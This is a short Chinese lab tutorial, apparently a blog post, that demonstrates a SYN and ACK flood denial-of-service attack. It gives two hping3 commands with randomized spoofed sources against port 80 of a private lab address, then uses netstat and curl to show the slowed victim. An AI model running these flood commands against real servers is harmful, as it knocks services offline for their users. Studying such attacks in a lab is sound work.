DDOS直接攻击系统资源

DDOS ------直接攻击系统资源

思路:

攻击机利用三次握手机制,产生大量半连接,挤占受害者系统资源,使其无法正常提供服务。

1、先体验下受害者的正常网速。在受害者主机上执行以下命令

(1)开启Apache。
systemctl start apache2

(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com

2、在攻击机上执行以下代码,发起syn flood和ack flood。

bash 复制代码
hping3  --flood  --rand-source  -S  -p 80 192.168.237.133
hping3  --flood  --rand-source  -A  -p 80 192.168.237.133

3、在受害机上观察

(1)输入netstat -ant,可以看到很多的半链接

(2)尝试再次请求百度首页代码。
curl baidu.com

发现系统资源被挤占,久久得不到回复。

相关推荐
weixin_307779131 小时前
Linux下Nginx故障系统化检查Shell脚本
linux·运维·服务器·nginx·自动化
jieyucx3 小时前
Docker 入门第一阶段:建立正确认知与初体验
运维·docker·容器
qetfw4 小时前
CentOS 7 基础环境配置
linux·运维·centos
jieyucx5 小时前
Docker 入门第二阶段:掌握日常命令
运维·docker·容器
随性而行3606 小时前
微信API接口与AI自动化:开发者的实现思路
运维·服务器·开发语言·人工智能·微信·自动化
菩提小狗7 小时前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全
胖兔纸27 小时前
OpenStack 1.7.2 & Ceph 9.2.1 运维命令
运维·ceph·openstack
不会C语言的男孩8 小时前
Docker 在嵌入式设备中的常用玩法
运维·docker·容器
ylscode8 小时前
CVE-2026-31694 漏洞深度分析:Linux 内核 FUSE 组件存在本地提权风险,普通用户可直取 root 权限
linux·运维·服务器
智脑API平台9 小时前
Codex CLI 怎么用 .env 配置 API Key?本地项目和自动化脚本接入教程
运维·自动化